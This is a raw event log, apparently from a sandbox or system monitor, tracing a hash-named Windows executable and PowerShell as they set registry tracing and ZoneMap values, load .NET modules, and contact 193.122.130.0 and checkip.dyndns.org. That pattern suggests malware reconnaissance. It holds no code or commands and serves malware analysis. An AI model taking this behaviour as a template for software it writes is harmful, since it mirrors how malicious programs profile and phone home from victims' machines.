09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_mkkey,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32,	access:0x0002001B ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableFileTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableAutoFileTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\EnableConsoleTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\FileTracingMask,	type:0x00000004 datalen:4 data:'00 00 FF FF ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\ConsoleTracingMask,	type:0x00000004 datalen:4 data:'00 00 FF FF ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\MaxFileSize,	type:0x00000004 datalen:4 data:'00 00 10 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:976,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASAPI32\FileDirectory,	type:0x00000002 datalen:34 data:'25 77 69 6E 64 69 72 25 5C 74 72 61 63 69 6E 67 ' ,	0x00000000 [操作成功完成。  ],	
09:33:16:991,	powershell.exe,	5080:7324,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_qnsb5ven.vxd.ps1,	,	0x00000000 [操作成功完成。  ],	
09:33:16:991,	powershell.exe,	5080:7324,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_hfpoh5qd.lbj.psm1,	,	0x00000000 [操作成功完成。  ],	
09:33:16:991,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_mkkey,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS,	access:0x0002001B ,	0x00000000 [操作成功完成。  ],	
09:33:16:991,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableFileTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableAutoFileTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\EnableConsoleTracing,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\FileTracingMask,	type:0x00000004 datalen:4 data:'00 00 FF FF ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\ConsoleTracingMask,	type:0x00000004 datalen:4 data:'00 00 FF FF ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\MaxFileSize,	type:0x00000004 datalen:4 data:'00 00 10 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	REG_setval,	HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\RASMANCS\FileDirectory,	type:0x00000002 datalen:34 data:'25 00 77 00 69 00 6E 00 64 00 69 00 72 00 25 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	powershell.exe,	5080:1928,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:007,	powershell.exe,	5080:1928,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:022,	powershell.exe,	5080:1928,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:022,	powershell.exe,	5080:1928,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000_Classes\Local Settings\MuiCache\9\AAF68885\LanguageList,	type:0x00000007 datalen:54 data:'7A 68 2D 43 4E 00 7A 68 2D 48 61 6E 73 00 7A 68 ' ,	0x00000000 [操作成功完成。  ],	
09:33:17:039,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:039,	powershell.exe,	5080:4668,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Data,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:039,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll,	base:0x00000000684C0000 size:0x00357000 ,	0x00000000 [操作成功完成。  ],	
09:33:17:116,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:116,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\6b3b4bf6dbe30207f4ef50f235d9a8ab\System.Configuration.ni.dll,	base:0x0000000073EC0000 size:0x00106000 ,	0x00000000 [操作成功完成。  ],	
09:33:17:148,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:148,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:148,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:163,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	NET_connect,	193.122.130.0:80,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:33:17:242,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:242,	powershell.exe,	5080:7324,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P6f792626#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:257,	powershell.exe,	5080:1928,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:272,	powershell.exe,	5080:1928,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:272,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll,	base:0x0000000068470000 size:0x0004C000 ,	0x00000000 [操作成功完成。  ],	
09:33:17:897,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:897,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PackageManagement,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\Pester,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PowerShellGet,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PSReadline,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:931,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:944,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:944,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:944,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:944,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:976,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:976,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:991,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppBackgroundTask,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:17:991,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppLocker,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:194,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Manaa57fc8cc#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Mf49f6405#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:259,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Numerics,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dired13b18a9#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Management,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Transactions,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1,	access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1,	offset:0x00000000 datalen:0x0000004D ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1,	,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_touch,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1,	access:0x00120196 alloc_size:0 attrib:0x00000000 share_access:0x00000001 disposition:0x00000005 options:0x00400064 ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:1160,	2928,	FILE_write,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1,	offset:0x00000000 datalen:0x0000004D ,	0x00000000 [操作成功完成。  ],	
09:33:18:272,	powershell.exe,	5080:0,	2928,	FILE_modified,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1,	,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_ilxoy4ze.yxx.ps1,	,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	FILE_remove,	C:\Users\bonelee\AppData\Local\Temp\__PSScriptPolicyTest_tunggdgo.upb.psm1,	,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet,	type:0x00000004 datalen:4 data:'01 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:289,	powershell.exe,	5080:1160,	2928,	REG_setval,	HKEY_USERS\S-1-5-21-2451103786-187343032-3810694054-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect,	type:0x00000004 datalen:4 data:'00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:304,	powershell.exe,	5080:0,	2928,	EXEC_module_load,	C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll,	base:0x00000000683C0000 size:0x000A4000 ,	0x00000000 [操作成功完成。  ],	
09:33:18:336,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Appx,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:336,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AssignedAccess,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:351,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PackageManagement,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\Pester,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:366,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PowerShellGet,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files\WindowsPowerShell\Modules\PSReadline,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\Pester,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:383,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Utility,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:398,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:413,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.P521220ea#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:429,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:429,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:522,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	NET_http,	checkip.dyndns.org/,	protocol:(TCP)0 cmd:'GET' ,	0x00000000 [操作成功完成。  ],	
09:33:18:522,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	NET_send,	193.122.130.0:80,	protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:572,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:585,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	NET_connect,	193.122.130.0:80,	protocol:(TCP)0 ,	0x00000000 [操作成功完成。  ],	
09:33:18:632,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	NET_http,	checkip.dyndns.org/,	protocol:(TCP)0 cmd:'GET' ,	0x00000000 [操作成功完成。  ],	
09:33:18:632,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:0,	2928,	NET_send,	193.122.130.0:80,	protocol:(TCP)0 datalen:151 data:'00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ' ,	0x00000000 [操作成功完成。  ],	
09:33:18:650,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitsTransfer,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:650,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BranchCache,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:664,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\CimCmdlets,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:664,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\ConfigCI,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:664,	powershell.exe,	5080:1160,	2928,	FILE_readdir,	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\Defender,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
09:33:18:664,	99b2648789b255b806ad8ef3e1452db4ababbf42e2cb91c94cf1d34cab808292.exe,	8816:4912,	2928,	FILE_readdir,	C:\Windows\Microsoft.NET\assembly\GAC_MSIL\mscorlib.resources,	filter:'*' ,	0x00000000 [操作成功完成。  ],	
